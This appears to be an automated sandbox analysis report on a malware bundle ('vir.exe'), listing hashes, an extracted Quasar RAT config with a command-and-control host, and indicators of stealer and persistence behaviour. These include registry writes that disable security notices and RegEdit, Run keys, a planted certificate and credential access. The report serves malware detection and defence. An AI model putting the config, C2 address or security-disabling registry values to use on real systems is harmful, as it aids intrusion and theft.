Resubmissions
27-09-2024 10:28
240927-mh3m1sxgrm 1018-08-2024 19:49
240818-yjmtqsthkm 1018-08-2024 14:30
240818-rvdxmsxgjg 1015-08-2024 23:29
240815-3g3jmawdnq 1015-08-2024 23:15
240815-28syts1brg 1015-08-2024 22:57
240815-2w8thszepa 1015-08-2024 22:44
240815-2n53natgpj 10Analysis
-
max time kernel
425s -
max time network
440s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
29-07-2024 19:25
Behavioral task
behavioral1
Sample
vir.exe
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
vir.exe
Resource
win10v2004-20240709-en
General
-
Target
vir.exe
-
Size
336.1MB
-
MD5
bc82ea785da1180a8a964b3e54ad106c
-
SHA1
4c1952ce778455af8ed10dca7b9f77d7815e8d0a
-
SHA256
c283ed662a29c18b117ba63ac41cca356934c6a29a1eb66e30d8305637e3411b
-
SHA512
62bf34d75e913a47185664a34555678d0b8c2cf03c9e922b0bdcb085713322bafba2bf396b43a4cda7e0be6d315aea027bba29c628fe561d01e3026b4e0b405b
-
SSDEEP
6291456:72qVJw+odBeWFv1k4R4b0ewZkhT4ofHwJjvZDQPf2tLSkHZdHVeVF0oJ:yr+WeSWgfecGT4RjvqP85/A33
Malware Config
Extracted
quasar
1.4.1
romka
jozzu420-51305.portmap.host:51305
0445c342-b551-411c-9b80-cd437437f491
-
encryption_key
E1BF1D99459F04CAF668F054744BC2C514B0A3D6
-
install_name
Romilyaa.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Windows 10 Boot
-
subdirectory
SubDir
Signatures
-
Detect Umbral payload 2 IoCs
Processes:
resource yara_rule behavioral1/files/0x00050000000195c8-217.dat family_umbral behavioral1/memory/1540-5108-0x0000000000BC0000-0x0000000000C00000-memory.dmp family_umbral -
MassLogger
Masslogger is a .NET stealer targeting passwords from browsers, email and cryptocurrency clients.
-
MassLogger Main payload 3 IoCs
Processes:
resource yara_rule behavioral1/memory/3156-5913-0x00000000005F0000-0x000000000068A000-memory.dmp family_masslogger behavioral1/memory/3156-5902-0x0000000000400000-0x0000000000541000-memory.dmp family_masslogger behavioral1/memory/3156-6172-0x0000000000400000-0x0000000000541000-memory.dmp family_masslogger -
Modifies visibility of file extensions in Explorer 2 TTPs 1 IoCs
Processes:
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" -
Modifies visiblity of hidden/system files in Explorer 2 TTPs 1 IoCs
Processes:
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" -
Quasar payload 15 IoCs
Processes:
resource yara_rule behavioral1/files/0x00050000000195c2-213.dat family_quasar behavioral1/memory/4048-3918-0x00000000000B0000-0x00000000003D4000-memory.dmp family_quasar behavioral1/memory/2336-3947-0x0000000000D70000-0x0000000001094000-memory.dmp family_quasar behavioral1/memory/3984-4422-0x0000000000390000-0x00000000006B4000-memory.dmp family_quasar behavioral1/memory/2552-4432-0x0000000000A70000-0x0000000000D94000-memory.dmp family_quasar behavioral1/memory/564-4449-0x00000000003E0000-0x0000000000704000-memory.dmp family_quasar behavioral1/memory/2948-4725-0x0000000000F10000-0x0000000001234000-memory.dmp family_quasar behavioral1/memory/3672-4805-0x00000000013A0000-0x00000000016C4000-memory.dmp family_quasar behavioral1/memory/4028-4945-0x00000000001D0000-0x00000000004F4000-memory.dmp family_quasar behavioral1/memory/1976-4958-0x0000000000AF0000-0x0000000000E14000-memory.dmp family_quasar behavioral1/memory/3252-4971-0x0000000000130000-0x0000000000454000-memory.dmp family_quasar behavioral1/memory/3184-4981-0x0000000000120000-0x0000000000444000-memory.dmp family_quasar behavioral1/memory/2788-5353-0x00000000011D0000-0x00000000014F4000-memory.dmp family_quasar behavioral1/memory/3080-5624-0x00000000011E0000-0x0000000001504000-memory.dmp family_quasar behavioral1/memory/2508-5771-0x00000000003C0000-0x00000000006E4000-memory.dmp family_quasar -
Processes:
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1" Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1" Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" -
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Blocklisted process makes network request 4 IoCs
Processes:
mshta.exeflow pid Process 29 4064 mshta.exe 33 4064 mshta.exe 39 4064 mshta.exe 41 4064 mshta.exe -
Disables RegEdit via registry modification 1 IoCs
Processes:
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" -
Download via BitsAdmin 1 TTPs 1 IoCs
-
Manipulates Digital Signatures 1 TTPs 2 IoCs
Attackers can apply techniques such as changing the registry keys of authenticode & Cryptography to obtain their binary as valid.
Processes:
iexplore.exedescription ioc Process Set value (data) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates\8CCC3E013F81D1893ADDBB852676D3B3336E87F3\Blob = 0f000000010000001400000012d41f144ce09eaf0e84a50a31a9ca194f55171c0200000001000000cc0000001c0000006c0000000100000000000000000000000000000001000000640035006500310031003200310037002d0033006100630035002d0034006500610030002d0062003100620062002d0037003200630039003400380038006100370065003300330000000000000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e003000000000000300000001000000140000008ccc3e013f81d1893addbb852676d3b3336e87f3200000000100000000030000308202fc308201e4a00302010202102d1839c91d1245b047c0775e0bb95159300d06092a864886f70d01010505003010310e300c0603550403130541646d696e3020170d3234303732393139323834365a180f32313234303730353139323834365a3010310e300c0603550403130541646d696e30820122300d06092a864886f70d01010105000382010f003082010a02820101009fbaa00c0c7696deedac3e5a6201203b1a85a5aceb428d9125b1a9c031a6ce2782b7673c0a54921a8e6037287de5cbf8acc9c328c7fd3c6413be49014a0c2e7917e24c680e5d5b511a843596209e6f418c373301f5df065142aeea86216b58ed02c1428f456837a2d431df73be1dc05ac8e0ecf4aca130233199c2dde93feb68ffdbd4f9effea4609915ec1cafa51e860416b1ac8d9ce8eb3ddfcedb1985d2e6891abba03f1c387d799c44f4126398761cde1f1df4e07d53a08f30b9e930ad2dcbb22042569a7164ff5f767609d271451946a789bc791ec58ef708f5d918c84fb18e4647ab2e7c975bc0d4015f07055bcfc689874372aba6d2cf84bc898ae6df0203010001a350304e30150603551d25040e300c060a2b0601040182370a0304302a0603551d1104233021a01f060a2b060104018237140203a0110c0f41646d696e404e4e594a5a4148500030090603551d1304023000300d06092a864886f70d01010505000382010100106ebbe5b1b3a0e5afae112fd93615e3f76ab0ad6f56e7a60377fc2fc4135330fc95217fd029fff6ed0c49a3f44d1a2bbf140ff3c71b99d011d204813d7371a6a1a64e5a177a10b7da61a0d22908ae1480a294a37e048a79e2ef72298309217ffe7cb1d1085a12be3152b644ce666e8c3e49e7c0e2da2dcc8df41c110c66fadbd4683398137398625c9be6485ddd2b95d5f7fd4acda17bdc58328884f3d2e9e8074243e36f00ba79fe77627724eae7a4ba1b31c2b3024da71794dc42aeb7c8e3e93aa29e45e380dcd39fb5b9441025941bfc7b0791abf670d159e531ff1e7f6cd64b7f444803d1d560bf394de4445bce7016767de97db3de9580b1c2ade6d6f4 iexplore.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates\8CCC3E013F81D1893ADDBB852676D3B3336E87F3\Blob = 0f000000010000001400000012d41f144ce09eaf0e84a50a31a9ca194f55171c0300000001000000140000008ccc3e013f81d1893addbb852676d3b3336e87f3200000000100000000030000308202fc308201e4a00302010202102d1839c91d1245b047c0775e0bb95159300d06092a864886f70d01010505003010310e300c0603550403130541646d696e3020170d3234303732393139323834365a180f32313234303730353139323834365a3010310e300c0603550403130541646d696e30820122300d06092a864886f70d01010105000382010f003082010a02820101009fbaa00c0c7696deedac3e5a6201203b1a85a5aceb428d9125b1a9c031a6ce2782b7673c0a54921a8e6037287de5cbf8acc9c328c7fd3c6413be49014a0c2e7917e24c680e5d5b511a843596209e6f418c373301f5df065142aeea86216b58ed02c1428f456837a2d431df73be1dc05ac8e0ecf4aca130233199c2dde93feb68ffdbd4f9effea4609915ec1cafa51e860416b1ac8d9ce8eb3ddfcedb1985d2e6891abba03f1c387d799c44f4126398761cde1f1df4e07d53a08f30b9e930ad2dcbb22042569a7164ff5f767609d271451946a789bc791ec58ef708f5d918c84fb18e4647ab2e7c975bc0d4015f07055bcfc689874372aba6d2cf84bc898ae6df0203010001a350304e30150603551d25040e300c060a2b0601040182370a0304302a0603551d1104233021a01f060a2b060104018237140203a0110c0f41646d696e404e4e594a5a4148500030090603551d1304023000300d06092a864886f70d01010505000382010100106ebbe5b1b3a0e5afae112fd93615e3f76ab0ad6f56e7a60377fc2fc4135330fc95217fd029fff6ed0c49a3f44d1a2bbf140ff3c71b99d011d204813d7371a6a1a64e5a177a10b7da61a0d22908ae1480a294a37e048a79e2ef72298309217ffe7cb1d1085a12be3152b644ce666e8c3e49e7c0e2da2dcc8df41c110c66fadbd4683398137398625c9be6485ddd2b95d5f7fd4acda17bdc58328884f3d2e9e8074243e36f00ba79fe77627724eae7a4ba1b31c2b3024da71794dc42aeb7c8e3e93aa29e45e380dcd39fb5b9441025941bfc7b0791abf670d159e531ff1e7f6cd64b7f444803d1d560bf394de4445bce7016767de97db3de9580b1c2ade6d6f4 iexplore.exe -
Modifies Windows Firewall 2 TTPs 1 IoCs
Processes:
netsh.exepid Process 3456 netsh.exe -
Possible privilege escalation attempt 5 IoCs
Processes:
takeown.exeicacls.exetakeown.exeicacls.exepid Process 3252 takeown.exe 3796 icacls.exe 2264 3688 takeown.exe 2888 icacls.exe -
.NET Reactor proctector 34 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
Processes:
resource yara_rule behavioral1/memory/1764-373-0x0000000005BF0000-0x0000000006140000-memory.dmp net_reactor behavioral1/memory/1764-374-0x0000000006140000-0x000000000668E000-memory.dmp net_reactor behavioral1/memory/1764-380-0x0000000006140000-0x0000000006689000-memory.dmp net_reactor behavioral1/memory/1764-400-0x0000000006140000-0x0000000006689000-memory.dmp net_reactor behavioral1/memory/1764-443-0x0000000006140000-0x0000000006689000-memory.dmp net_reactor behavioral1/memory/1764-440-0x0000000006140000-0x0000000006689000-memory.dmp net_reactor behavioral1/memory/1764-438-0x0000000006140000-0x0000000006689000-memory.dmp net_reactor behavioral1/memory/1764-436-0x0000000006140000-0x0000000006689000-memory.dmp net_reactor behavioral1/memory/1764-435-0x0000000006140000-0x0000000006689000-memory.dmp net_reactor behavioral1/memory/1764-432-0x0000000006140000-0x0000000006689000-memory.dmp net_reactor behavioral1/memory/1764-430-0x0000000006140000-0x0000000006689000-memory.dmp net_reactor behavioral1/memory/1764-428-0x0000000006140000-0x0000000006689000-memory.dmp net_reactor behavioral1/memory/1764-426-0x0000000006140000-0x0000000006689000-memory.dmp net_reactor behavioral1/memory/1764-422-0x0000000006140000-0x0000000006689000-memory.dmp net_reactor behavioral1/memory/1764-420-0x0000000006140000-0x0000000006689000-memory.dmp net_reactor behavioral1/memory/1764-419-0x0000000006140000-0x0000000006689000-memory.dmp net_reactor behavioral1/memory/1764-414-0x0000000006140000-0x0000000006689000-memory.dmp net_reactor behavioral1/memory/1764-412-0x0000000006140000-0x0000000006689000-memory.dmp net_reactor behavioral1/memory/1764-410-0x0000000006140000-0x0000000006689000-memory.dmp net_reactor behavioral1/memory/1764-406-0x0000000006140000-0x0000000006689000-memory.dmp net_reactor behavioral1/memory/1764-404-0x0000000006140000-0x0000000006689000-memory.dmp net_reactor behavioral1/memory/1764-402-0x0000000006140000-0x0000000006689000-memory.dmp net_reactor behavioral1/memory/1764-398-0x0000000006140000-0x0000000006689000-memory.dmp net_reactor behavioral1/memory/1764-396-0x0000000006140000-0x0000000006689000-memory.dmp net_reactor behavioral1/memory/1764-394-0x0000000006140000-0x0000000006689000-memory.dmp net_reactor behavioral1/memory/1764-391-0x0000000006140000-0x0000000006689000-memory.dmp net_reactor behavioral1/memory/1764-389-0x0000000006140000-0x0000000006689000-memory.dmp net_reactor behavioral1/memory/1764-387-0x0000000006140000-0x0000000006689000-memory.dmp net_reactor behavioral1/memory/1764-385-0x0000000006140000-0x0000000006689000-memory.dmp net_reactor behavioral1/memory/1764-383-0x0000000006140000-0x0000000006689000-memory.dmp net_reactor behavioral1/memory/1764-424-0x0000000006140000-0x0000000006689000-memory.dmp net_reactor behavioral1/memory/1764-416-0x0000000006140000-0x0000000006689000-memory.dmp net_reactor behavioral1/memory/1764-381-0x0000000006140000-0x0000000006689000-memory.dmp net_reactor behavioral1/memory/1764-408-0x0000000006140000-0x0000000006689000-memory.dmp net_reactor -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Control Panel\International\Geo\Nation -
Drops startup file 3 IoCs
Processes:
!FIXInj.exedescription ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7c148ac38012fc3caa04b1bbe75feba0.exe !FIXInj.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7c148ac38012fc3caa04b1bbe75feba0.exe !FIXInj.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\win.vbs -
Executes dropped EXE 55 IoCs
Processes:
Rover.exeGoogle.exeregmess.exe1.exe3.exeWinaeroTweaker-1.40.0.0-setup.exeWinaeroTweaker-1.40.0.0-setup.tmppsiphon-tunnel-core.exethe.exescary.exewimloader.dllRomilyaa.exeRomilyaa.exeRomilyaa.exeRomilyaa.exeRomilyaa.exeRomilyaa.exeRomilyaa.exeac3.exeRomilyaa.exeRomilyaa.exeRomilyaa.exeRomilyaa.exeRomilyaa.exefreebobux.exeSolaraBootstraper.exeCLWCP.exewim.dllSolaraBootstrapper.exeUmbral.exe!FIXInj.exeRomilyaa.exeRomilyaa.exepid Process 1764 Rover.exe 2420 Google.exe 3716 regmess.exe 3780 1.exe 3904 3.exe 2592 WinaeroTweaker-1.40.0.0-setup.exe 3108 WinaeroTweaker-1.40.0.0-setup.tmp 2880 psiphon-tunnel-core.exe 4052 the.exe 4048 scary.exe 3772 wimloader.dll 2336 Romilyaa.exe 2676 Romilyaa.exe 3984 Romilyaa.exe 2552 Romilyaa.exe 564 Romilyaa.exe 2948 Romilyaa.exe 3672 Romilyaa.exe 2164 ac3.exe 3012 Romilyaa.exe 4028 Romilyaa.exe 1976 Romilyaa.exe 3252 Romilyaa.exe 3184 Romilyaa.exe 744 freebobux.exe 1804 SolaraBootstraper.exe 3096 CLWCP.exe 3008 wim.dll 4000 SolaraBootstrapper.exe 1540 Umbral.exe 4060 !FIXInj.exe 1520 Romilyaa.exe 2788 Romilyaa.exe 2652 3232 3080 352 2508 2696 3652 2756 2680 3900 884 2028 1696 3156 3916 2152 1780 3064 1648 3452 1664 1716 -
Loads dropped DLL 57 IoCs
Processes:
cmd.execmd.exe1.execmd.exeWinaeroTweaker-1.40.0.0-setup.exeWinaeroTweaker-1.40.0.0-setup.tmp3.execmd.exeSolaraBootstraper.exevir.exepid Process 1120 cmd.exe 1120 cmd.exe 1120 cmd.exe 3708 cmd.exe 3708 cmd.exe 3780 1.exe 1680 cmd.exe 3780 1.exe 2592 WinaeroTweaker-1.40.0.0-setup.exe 3108 WinaeroTweaker-1.40.0.0-setup.tmp 3108 WinaeroTweaker-1.40.0.0-setup.tmp 3108 WinaeroTweaker-1.40.0.0-setup.tmp 3108 WinaeroTweaker-1.40.0.0-setup.tmp 3108 WinaeroTweaker-1.40.0.0-setup.tmp 3904 3.exe 3904 3.exe 1120 cmd.exe 1120 cmd.exe 1120 cmd.exe 3988 1120 cmd.exe 1120 cmd.exe 1120 cmd.exe 1120 cmd.exe 1120 cmd.exe 1120 cmd.exe 2104 cmd.exe 2104 cmd.exe 1120 cmd.exe 1804 SolaraBootstraper.exe 1804 SolaraBootstraper.exe 1804 SolaraBootstraper.exe 1120 cmd.exe 1120 cmd.exe 1120 cmd.exe 1120 cmd.exe 2696 2696 2696 2696 3724 3724 2756 1120 cmd.exe 1120 cmd.exe 2152 1780 1780 3064 1716 vir.exe 1988 3452 936 936 936 936 936 -
Modifies file permissions 1 TTPs 5 IoCs
Processes:
icacls.exetakeown.exeicacls.exetakeown.exepid Process 3796 icacls.exe 2264 3688 takeown.exe 2888 icacls.exe 3252 takeown.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule behavioral1/files/0x0005000000019329-197.dat upx behavioral1/files/0x0005000000019c0b-229.dat upx behavioral1/memory/3904-3430-0x0000000001120000-0x0000000002747000-memory.dmp upx behavioral1/memory/3904-4411-0x0000000001120000-0x0000000002747000-memory.dmp upx behavioral1/memory/744-5020-0x0000000000400000-0x000000000083E000-memory.dmp upx behavioral1/memory/744-5279-0x0000000000400000-0x000000000083E000-memory.dmp upx behavioral1/memory/3156-5902-0x0000000000400000-0x0000000000541000-memory.dmp upx -
Processes:
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirstRunDisabled = "1" Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1" Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1" Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" -
Accesses Microsoft Outlook profiles 1 TTPs 35 IoCs
Processes:
description ioc Process Key queried \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook Key queried \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook Key queried \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Key queried \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook Key queried \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Key queried \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook Key queried \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook Key queried \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Key opened \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook Key opened \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Key opened \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Key opened \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Key queried \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Key opened \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Key opened \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Key queried \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook Key queried \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Key queried \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook Key opened \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Key queried \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Key queried \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook -
Adds Run key to start application 2 TTPs 6 IoCs
Processes:
!FIXInj.exedescription ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\3d6697b8-3782-4c38-bd3c-9d9982811219\\selfaware.exe\" --AutoStart" Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\dhajxjvk = "lgwoluvdxh.exe" Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\vntjabnf = "rftgzakwzpmempe.exe" Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\ = "dskekgntpunnt.exe" Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\7c148ac38012fc3caa04b1bbe75feba0 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\!FIXInj.exe\" .." !FIXInj.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\7c148ac38012fc3caa04b1bbe75feba0 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\!FIXInj.exe\" .." !FIXInj.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
cmd.exedescription ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA cmd.exe -
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
description ioc Process File opened (read-only) \??\m: File opened (read-only) \??\q: File opened (read-only) \??\b: File opened (read-only) \??\g: File opened (read-only) \??\p: File opened (read-only) \??\w: File opened (read-only) \??\l: File opened (read-only) \??\b: File opened (read-only) \??\z: File opened (read-only) \??\x: File opened (read-only) \??\w: File opened (read-only) \??\j: File opened (read-only) \??\s: File opened (read-only) \??\u: File opened (read-only) \??\j: File opened (read-only) \??\u: File opened (read-only) \??\v: File opened (read-only) \??\n: File opened (read-only) \??\t: File opened (read-only) \??\q: File opened (read-only) \??\w: File opened (read-only) \??\g: File opened (read-only) \??\t: File opened (read-only) \??\x: File opened (read-only) \??\t: File opened (read-only) \??\x: File opened (read-only) \??\z: File opened (read-only) \??\o: File opened (read-only) \??\h: File opened (read-only) \??\a: File opened (read-only) \??\m: File opened (read-only) \??\o: File opened (read-only) \??\p: File opened (read-only) \??\l: File opened (read-only) \??\e: File opened (read-only) \??\y: File opened (read-only) \??\q: File opened (read-only) \??\g: File opened (read-only) \??\l: File opened (read-only) \??\y: File opened (read-only) \??\h: File opened (read-only) \??\y: File opened (read-only) \??\v: File opened (read-only) \??\i: File opened (read-only) \??\a: File opened (read-only) \??\h: File opened (read-only) \??\o: File opened (read-only) \??\b: File opened (read-only) \??\p: File opened (read-only) \??\a: File opened (read-only) \??\u: File opened (read-only) \??\e: File opened (read-only) \??\i: File opened (read-only) \??\r: File opened (read-only) \??\i: File opened (read-only) \??\s: File opened (read-only) \??\n: File opened (read-only) \??\r: File opened (read-only) \??\k: File opened (read-only) \??\z: File opened (read-only) \??\e: File opened (read-only) \??\s: File opened (read-only) \??\m: File opened (read-only) \??\v: -
Modifies WinLogon 2 TTPs 2 IoCs
Processes:
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SFCScan = "0" Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SFCDisable = "4294967197" -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Password Policy Discovery 1 TTPs
Attempt to access detailed information about the password policy used within an enterprise network.
-
AutoIT Executable 4 IoCs
AutoIT scripts compiled to PE executables.
Processes:
resource yara_rule behavioral1/files/0x0005000000019232-107.dat autoit_exe behavioral1/files/0x00050000000191d1-192.dat autoit_exe behavioral1/files/0x000500000001937b-202.dat autoit_exe behavioral1/files/0x000400000001da2e-5857.dat autoit_exe -
Drops file in System32 directory 9 IoCs
Processes:
description ioc Process File created C:\Windows\SysWOW64\lgwoluvdxh.exe File opened for modification C:\Windows\SysWOW64\rftgzakwzpmempe.exe File created C:\Windows\SysWOW64\fgrveqgc.exe File opened for modification C:\Windows\SysWOW64\dskekgntpunnt.exe File opened for modification C:\Windows\SysWOW64\msvbvm60.dll File opened for modification C:\Windows\SysWOW64\lgwoluvdxh.exe File created C:\Windows\SysWOW64\rftgzakwzpmempe.exe File opened for modification C:\Windows\SysWOW64\fgrveqgc.exe File created C:\Windows\SysWOW64\dskekgntpunnt.exe -
